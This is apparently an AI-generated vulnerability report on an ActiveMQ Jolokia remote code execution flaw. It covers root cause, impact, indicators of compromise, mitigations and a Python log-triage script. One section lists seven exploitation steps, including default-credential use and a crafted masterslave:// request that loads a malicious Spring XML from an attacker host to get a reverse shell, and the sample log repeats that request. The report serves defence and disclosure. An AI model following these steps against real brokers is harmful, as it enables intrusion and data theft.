CVE-2026-42588
Java vulnerability analysis and mitigation

Overview

CVE-2026-42588 is a Remote Code Execution vulnerability in Apache ActiveMQ Classic, classified as Improper Input Validation (CWE-20) and Code Injection (CWE-94). It affects Apache ActiveMQ, ActiveMQ Broker, and ActiveMQ All in versions before 5.19.7 and from 6.0.0 before 6.2.6. The vulnerability was disclosed on May 31, 2026 via the oss-security mailing list and published to NVD on June 1, 2026. It carries a CVSS v3.1 base score of 8.1 (High) (GitHub Advisory, Openwall).

Technical details

The root cause lies in Apache ActiveMQ Classic's exposure of the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console, where the default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String). An authenticated attacker can invoke this operation with a crafted discovery URI using the masterslave:// URL scheme, whose brokerConfig parameter causes the VM transport to load a remote Spring XML application context via ResourceXmlApplicationContext. Because Spring instantiates all singleton beans before the BrokerService validates the configuration, bean factory methods such as Runtime.exec() run on the broker's JVM before any validation step can reject the connector (Openwall, GitHub Advisory).

Impact

Successful exploitation allows an authenticated attacker to execute arbitrary code on the broker's JVM with the privileges of the ActiveMQ process, resulting in high confidentiality and integrity impact. An attacker can read sensitive data accessible to the broker process, modify broker configuration, deploy malicious payloads, or pivot to other systems reachable from the broker host. Availability is not directly impacted by the vulnerability itself, but post-exploitation actions could disrupt broker operations (GitHub Advisory, Openwall).

Exploitation steps

  1. Reconnaissance: Identify internet-facing Apache ActiveMQ instances (versions before 5.19.7 or 6.0.0–6.2.5) using tools like Shodan or Censys, searching for the ActiveMQ web console (typically on port 8161).
  2. Obtain credentials: Acquire valid credentials for the ActiveMQ web console — default credentials (admin/admin) are common in unmodified deployments.
  3. Confirm Jolokia exposure: Verify that the Jolokia endpoint is accessible at http://<target>:8161/api/jolokia/ and that exec operations on org.apache.activemq:* MBeans are permitted.
  4. Host malicious Spring XML: Set up an attacker-controlled server (VPS) hosting a malicious Spring XML application context file that defines a singleton bean invoking Runtime.exec() with a reverse shell or other payload.
  5. Craft the exploit request: Send an authenticated HTTP POST or GET request to the Jolokia endpoint invoking BrokerService.addNetworkConnector with a crafted discovery URI in the form masterslave://...?brokerConfig=xbean:http://<attacker-vps>/malicious.xml.
  6. Trigger RCE: Spring's ResourceXmlApplicationContext fetches and instantiates the malicious XML before BrokerService validation, executing the attacker's payload (e.g., reverse shell) on the broker's JVM.
  7. Establish persistence: Use the achieved shell to deploy a persistent backdoor, exfiltrate data, or pivot to other internal systems reachable from the broker host (Openwall, GitHub Advisory).

Indicators of compromise

  • Network: Unusual HTTP requests to /api/jolokia/ on the ActiveMQ web console port (default 8161), particularly POST requests invoking BrokerService.addNetworkConnector with masterslave:// URIs; outbound HTTP/HTTPS connections from the ActiveMQ server to unknown external IPs (fetching remote XML); unexpected reverse shell connections from the broker host to external IPs.
  • Logs: ActiveMQ access logs showing authenticated requests to /api/jolokia/exec/org.apache.activemq:*/addNetworkConnector with encoded or suspicious URI parameters; Java stack traces in ActiveMQ logs related to ResourceXmlApplicationContext or Spring bean instantiation errors; log entries showing connections to attacker-controlled hosts.
  • File System: Unexpected files written to the ActiveMQ installation directory or temp directories (e.g., downloaded XML files, web shells, or scripts); new cron jobs or scheduled tasks created under the ActiveMQ service account.
  • Process: Unusual child processes spawned by the ActiveMQ Java process (e.g., /bin/bash, cmd.exe, curl, wget, python, nc); unexpected network connections initiated by the Java process.
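A small access-log triage script for the network and log indicators above, added here as an example; it is not part of the Wiz report or of ActiveMQ. It assumes the web console's Jetty instance writes an NCSA-style request log (adjust LOG_RE otherwise) and runs over constructed sample lines; since POST bodies never reach an access log, a bare POST to Jolokia is only flagged for review.

```python
import re
from urllib.parse import unquote

# NCSA-style request log line. Assumption: the ActiveMQ web console's Jetty
# instance writes an NCSA request log; adjust LOG_RE for other formats.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" \d{3} \S+')
JOLOKIA_PREFIX = "/api/jolokia"
# Signatures from the advisory: exec of addNetworkConnector, masterslave:// URI, remote brokerConfig.
HIGH_SIGNALS = ("addnetworkconnector", "masterslave:", "brokerconfig=")

def fully_decode(s: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding (bounded) so encoded parameters still match."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def classify(line: str):
    """(severity, reason) for one line; None if it is not a Jolokia request."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = fully_decode(m.group("path"))
    if not path.startswith(JOLOKIA_PREFIX):
        return None
    who = f"{m.group('user')}@{m.group('ip')} {m.group('method')}"
    hits = [sig for sig in HIGH_SIGNALS if sig in path.lower()]
    if hits:
        return ("HIGH", f"{who} Jolokia request matching {hits}")
    if m.group("method") == "POST":
        # Jolokia exec calls may travel in a JSON POST body the access log never records.
        return ("MEDIUM", f"{who} to Jolokia (body not logged, review)")
    return ("INFO", f"{who} Jolokia read")

def scan(lines):
    """Collect every MEDIUM/HIGH finding from an iterable of log lines."""
    return [r for r in map(classify, lines) if r and r[0] != "INFO"]
# Constructed sample lines (RFC 5737 addresses), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - admin [01/Jun/2026:10:00:01 +0000] "GET /api/jolokia/version HTTP/1.1" 200 148',
    '203.0.113.7 - admin [01/Jun/2026:10:02:13 +0000] "POST /api/jolokia/ HTTP/1.1" 200 211',
    '203.0.113.7 - admin [01/Jun/2026:10:02:40 +0000] "GET /api/jolokia/exec/'
    'org.apache.activemq:type=Broker,brokerName=localhost/addNetworkConnector/'
    'masterslave%3A%2F%2F%28tcp%3A%2F%2Fx%3A61616%29%3FbrokerConfig%3Dxbean%3Ahttp%3A%2F%2F198.51.100.9%2Fm.xml HTTP/1.1" 200 97',
    '10.0.0.9 - - [01/Jun/2026:10:03:00 +0000] "GET /admin/index.jsp HTTP/1.1" 200 5120',
]
```

Feed real log lines to scan() and forward MEDIUM/HIGH findings to your SIEM; the INFO class shows that ordinary Jolokia reads are not in themselves suspicious.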

Mitigation and workarounds

Apache has released patched versions 5.19.7 and 6.2.6 that fix this issue; upgrading is the primary recommended remediation (Openwall, GitHub Advisory). As interim workarounds: restrict network access to the Jolokia endpoint (/api/jolokia/) using firewall rules or reverse proxy ACLs so it is not accessible from untrusted networks; enforce strong, non-default credentials for the ActiveMQ web console; and customize the Jolokia access policy (jolokia-access.xml) to deny exec operations on BrokerService.addNetworkConnector or restrict allowed MBean operations to the minimum required.

Community reactions

The vulnerability was reported by researchers credited as pyn3rd, uname, and 4ra1n (Openwall). Security news outlet SecurityOnline.info covered the flaw, highlighting the Jolokia exploit angle (Feedly). The CVE appeared in a weekly threat landscape digest and was trending in CVE watch communities on Reddit and Bluesky, reflecting moderate community interest given the availability of a public PoC tool. No major vendor statements beyond the Apache advisory have been identified.

Additional resources

Source

This report was generated using artificial intelligence.

